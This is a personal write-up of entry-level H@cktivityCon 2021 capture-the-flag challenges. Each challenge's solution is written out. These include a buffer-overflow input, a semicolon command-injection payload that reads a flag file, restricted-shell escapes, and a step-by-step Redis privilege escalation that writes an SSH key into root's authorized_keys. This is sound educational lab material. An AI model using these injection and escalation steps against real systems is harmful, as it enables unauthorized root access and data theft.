H@ctivityCon 2021 - CTF Writeups

H@cktivityCon is a conference organized by HackerOne every year. This was my first ever conference and CTF competition. Even though I had little experience with CTF (Mostly from TryHackMe) I had difficulty solving many problems. I was able to solve some entry level challenges. Here are some writeups for H@ctivityCon CTF which I was able to solve.

Target Practice

We were given a GIF file after opening we can see it has some sort of 2D barcode on it, which changes pretty quick and was looping infinitely. So I decided to slow down the GIF animation, I used lunapic to slow down the animation in GIF. I knew this weird looking 2D barcode were MaxiCode. I recognized this from a video I have watched by Thio Joe on What Are Those Other Weird QR Codes?. I quickly downloaded this Barcode Scanner on my phone and started scanning all frames from the GIF. One of the frame contained this flag.

flag{385e3ae5d7b2ca2510be8ef4}

2ez

We were given a file named 2ez.
I tried running file 2ez but didn't get any useful information.
Then I checked the file headers by using hexdump -n 36 -c 2ez command

JFIF header means a jpeg file
Correct header for JFIF in hex is: FF D8 FF
But if we look at the file given to us it's different, so I fixed it using xxd -r -p -o 0 <(echo "FFD8 FEE0 0010") 2ez this command
Now if we open this jpeg file it has flag in it.

flag{812a2ca65f334ea1ab234d8af3c64d19}

TSUNAMI

We were given a .wav audio file named tsunami.wav.
Firstly I checked the audio file with Academo.
On viewing spectrum of wav file we get flag at the end of audio file.

Six Four Over Two

We were given a cipher text which looked like base32 so I decoded it and got the flag

┌──(kali㉿kali)-[~]
└─$ echo "EBTGYYLHPNQTINLEGRSTOMDCMZRTIMBXGY2DKMJYGVSGIOJRGE2GMOLDGBSWM7IK" | base32 -d 
flag{a45d4e70bfc407645185dd9114f9c0ef}

Bass64

We were given a text file in this challenge.
File contains letters and numbers in big ASCII art.
Which looked like this:

It's actually a base64 string and converting it gives the flag.

┌──(kali㉿kali)-[~/Downloads]
└─$ echo "IGZsYWd7MzVhNWQxM2RhNmEyYWZhMGM2MmJmY2JkZDYzMDFhMGF9" | base64 -d 
flag{35a5d13da6a2afa0c62bfcbdd6301a0a}

Buffer Overflow

We were given a source code file containing the following code:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/stat.h>

void give_flag();

void handler(int sig) {
    if (sig == SIGSEGV)
        give_flag();
}

void give_flag() {
    char *flag = NULL;
    FILE *fp = NULL;
    struct stat sbuf;

    if ((fp = fopen("flag.txt", "r")) == NULL) {
        puts("Could not open flag file.");
        exit(EXIT_FAILURE);
    }

    fstat(fileno(fp), &sbuf);

    flag = malloc(sbuf.st_size + 1);
    if (flag == NULL) {
        puts("Failed to allocate memory for the flag.");
        exit(EXIT_FAILURE);
    }

    fread(flag, sizeof(char), sbuf.st_size, fp);
    flag[sbuf.st_size] = '\0';

    puts(flag);

    fclose(fp);
    free(flag);

    exit(EXIT_SUCCESS);
}

int main() {
    char buffer[0x200];

    setbuf(stdout, NULL);
    setbuf(stdin, NULL);

    signal(SIGSEGV, handler);

    puts("How many bytes does it take to overflow this buffer?");
    gets(buffer);

    return 0;
}

On examining the code we can see a handler() function which prints flag stored in a flag.txt file somewhere on the server once the program detects segmentation fault SIGSEGV. For causing segmentation fault we have to overflow the buffer variable of size 0x200 (512 in decimal).

┌──(kali㉿kali)-[~]
└─$ nc challenge.ctf.games 30054  
How many bytes does it take to overflow this buffer? 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
flag{72d8784a5da3a8f56d2106c12dbab989}

Confidentiality

This was a simple web application which was listing all the files under given directory using ls -la command
For exploiting this we can simply use ; to separate our command and the system command
/home/user; cat /home/user/flag.txt

Shelle

In this challenge, we got a shell with some limitations. We can only use the 7 commands cat, ls, pwd, whoami, ps, id, echo as mentioned in the assignment.txt file.

Most of the characters (*, !, @, ; and others) and commands were blacklisted. After trying every possible way I noticed $ was not blacklisted. So, I immediately entered $SHELL which spawned a shell for us and we got our flag.

Bad Words

In this challenge, we got a shell with strict limitation and were not allowed to run any command because they were bad. Surprisingly I tried to call command with its full path and it worked

user@host:/home/user$ /bin/cat ./just/out/of/reach/flag.txt
/bin/cat just/out/of/reach/flag.txt
flag{2d43e30a358d3f30fe65cc47a9cbbe98}

Redlike

This challenge was my favorite. All we got is an SSH command and a password for connecting to a remote server. Our task was to gain root access and read the flag in /root.

Honestly, at first I gave up this challenge because I was not able to find any lead. Then I tried running linpeas.sh and from the output I got to know there was redis.conf file. Immediately after knowing there is a redis server exposed I googled for its exploits.

On googling I came across this blog by Vickie Li she's my favourite blogger. In the blog she mentioned "If an attacker gains access to an overprivileged Redis instance, they can utilize Redis to escalate their privileges on the system. Attackers can use Redis to write their RSA public key to the /root/.ssh/authorized_keys file and gain root access through SSH."

As per the instruction I created my rsa keys locally:

┌──(kali㉿kali)-[~]
└─$ ssh-keygen -t rsa -b 2048

Then pad the top and bottom of the file with newlines with this command:

(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > key.txt

Then I use redis-cli service to write the key file using:

cat key.txt | redis-cli -h 127.0.0.1 -x set cmd

Finally, we can configure Redis and write the public key file into the "authorized_keys" file in "/root/.ssh".

> config set dir /root/.ssh/
> config set dbfilename "authorized_keys"
> save

Now ssh as root on the machine

user@redlike-44e6479a7e6be38a-6559588cdd-ww42g:~$ ssh -i id_rsa root@127.0.0.1
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.120+ x86_64)

root@redlike-44e6479a7e6be38a-6559588cdd-ww42g:~# ls
flag.txt
root@redlike-44e6479a7e6be38a-6559588cdd-ww42g:~# cat flag.txt
flag{69dc14707af23b728ebd1363715ec890}

Reflection: This was my first CTF competition and a great learning experience. Each challenge taught me something new about different areas of cybersecurity - from steganography and forensics to web exploitation and privilege escalation. The Redis privilege escalation was particularly interesting and something I've used in real penetration testing scenarios since then.